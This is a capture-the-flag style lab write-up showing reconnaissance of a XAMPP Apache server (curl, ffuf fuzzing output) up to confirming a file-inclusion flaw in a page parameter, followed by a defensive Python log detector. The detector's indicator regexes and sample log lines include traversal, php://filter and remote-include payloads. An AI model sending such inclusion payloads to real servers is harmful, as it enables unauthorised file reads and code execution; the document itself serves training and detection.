Web
Nmap discovered a web server on the target port 8080.
The running service is Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6).
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -i http://$IP:8080/
HTTP/1.1 302 Found
Date: Fri, 07 Feb 2025 18:34:34 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: http://192.168.134.53:8080/dashboard/
Content-Length: 0
Content-Type: text/html; charset=UTF-8
302 redirect to http://192.168.134.53:8080/dashboard/
It’s the default installation of XAMPP Apache.
The web server appears identical to the web server on the target port 4443.
Fuzzing
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u http://$IP:8080/FUZZ -ic
________________________________________________
:: Method : GET
:: URL : http://192.168.134.53:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.htpasswd [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 372ms]
.htaccess [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 791ms]
aux [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 33ms]
cgi-bin/ [Status: 403, Size: 1060, Words: 103, Lines: 43, Duration: 40ms]
com1 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 29ms]
com4 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 27ms]
com3 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 46ms]
com2 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 55ms]
con [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 81ms]
dashboard [Status: 301, Size: 351, Words: 22, Lines: 10, Duration: 27ms]
favicon.ico [Status: 200, Size: 30894, Words: 412, Lines: 6, Duration: 24ms]
img [Status: 301, Size: 345, Words: 22, Lines: 10, Duration: 22ms]
licenses [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 100ms]
lpt2 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 36ms]
lpt1 [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 45ms]
nul [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 51ms]
phpmyadmin [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 72ms]
prn [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 44ms]
server-info [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 22ms]
server-status [Status: 403, Size: 1205, Words: 127, Lines: 46, Duration: 30ms]
site [Status: 301, Size: 346, Words: 22, Lines: 10, Duration: 22ms]
webalizer [Status: 403, Size: 1046, Words: 102, Lines: 43, Duration: 49ms]
xampp [Status: 301, Size: 347, Words: 22, Lines: 10, Duration: 22ms]
:: Progress: [20478/20478] :: Job [1/1] :: 588 req/sec :: Duration: [0:00:54] :: Errors: 0 ::
/site/
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ curl -I http://$IP:8080/site/
HTTP/1.1 301 Moved Permanently
Date: Fri, 07 Feb 2025 21:27:40 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
X-Powered-By: PHP/7.4.6
Location: index.php?page=main.php
Content-Type: text/html; charset=UTF-8
301 redirect to /site/index.php?page=main.php
There appears to be a file inclusion at the page parameter of the index.php file.
LFI
LFI confirmed
RFI
RFI confirmed
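For the defender's side of the page parameter inclusion confirmed above (both the LFI and the RFI case), here is an added example that is not part of the original write-up: a small Python detector that reads Apache access log lines, extracts the page parameter from /site/index.php requests, and flags the indicators a detection engineer would alert on (traversal sequences, PHP stream wrappers, remote URL schemes, absolute paths, null bytes), with an allow-list check standing in for the fix the application itself should apply. It assumes the Apache combined log format and an allow-list of page names that is invented for the demo; the log lines are constructed, not captured from the target.

```python
"""Detect file-inclusion attempts against a `page=` parameter in Apache access logs.

Added example, not code from the original write-up. Assumptions: Apache "combined"
log format, the parameter name `page` seen on /site/index.php, and a demo allow-list.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined format: client ident user [time] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Indicators worth alerting on in any value that reaches include()/require().
INDICATORS = [
    ("php_wrapper", re.compile(r'^(php|data|expect|phar|zip|glob)://', re.I)),  # stream wrappers
    ("remote_url", re.compile(r'^(https?|ftps?)://', re.I)),                    # RFI: remote include
    ("path_traversal", re.compile(r'(\.\./|\.\.\\)')),                           # LFI: ../ or ..\
    ("absolute_path", re.compile(r'^(/|[A-Za-z]:[\\/])')),                       # /etc/..., C:\...
    ("null_byte", re.compile(r'\x00')),                                          # truncation attempts
]

# Pages the application legitimately ships (assumed for the demo). This is also the
# mitigation: the PHP side should map `page` against such a fixed set, never include it raw.
ALLOWED_PAGES = {"main.php", "about.php", "contact.php"}

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = [
    '192.168.45.10 - - [07/Feb/2025:18:40:01 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 2213 "-" "Mozilla/5.0"',
    '192.168.45.10 - - [07/Feb/2025:18:40:05 +0000] "GET /favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0"',
    '192.168.45.10 - - [07/Feb/2025:18:40:09 +0000] "GET /site/index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '192.168.45.10 - - [07/Feb/2025:18:40:15 +0000] "GET /site/index.php?page=http%3A%2F%2F192.168.45.10%2Fx.txt HTTP/1.1" 200 120 "-" "curl/8.5.0"',
    '192.168.45.10 - - [07/Feb/2025:18:40:21 +0000] "GET /site/index.php?page=%252e%252e%2F%252e%252e%2Fwindows%2Fwin.ini HTTP/1.1" 200 512 "-" "curl/8.5.0"',
    '192.168.45.10 - - [07/Feb/2025:18:40:27 +0000] "GET /site/index.php?page=php%3A%2F%2Ffilter%2Fresource%3Dmain.php HTTP/1.1" 200 3001 "-" "curl/8.5.0"',
    '192.168.45.10 - - [07/Feb/2025:18:40:33 +0000] "GET /site/index.php?page=admin.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]


def normalise(raw: str) -> str:
    """parse_qs already decoded once; decode a second time so %252e.. (double-encoded) collapses."""
    return unquote(raw)


def classify_page_value(value: str) -> list[str]:
    """Return the indicator names matching a normalised `page` value (empty list if benign)."""
    hits = [name for name, rx in INDICATORS if rx.search(value)]
    if not hits and value not in ALLOWED_PAGES:
        hits.append("not_in_allowlist")   # unknown page name: probing, even if no syntax tripped
    return hits


def scan_log(lines: list[str], param: str = "page") -> list[dict]:
    """Parse each log line and collect one finding per suspicious `page` value."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for raw in parse_qs(query, keep_blank_values=True).get(param, []):
            value = normalise(raw)
            hits = classify_page_value(value)
            if hits:
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("time"),
                    "status": int(m.group("status")),
                    "value": value,
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} status={f['status']} {f['indicators']} page={f['value']!r}")
```

Two design points: the second decode pass matters because a single-decode rule misses `%252e%252e%2F`, and the allow-list branch is the same check the application should enforce server-side, so a finding of `not_in_allowlist` in the logs is evidence that the fix is either missing or being probed.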
Moving on to the Exploitation phase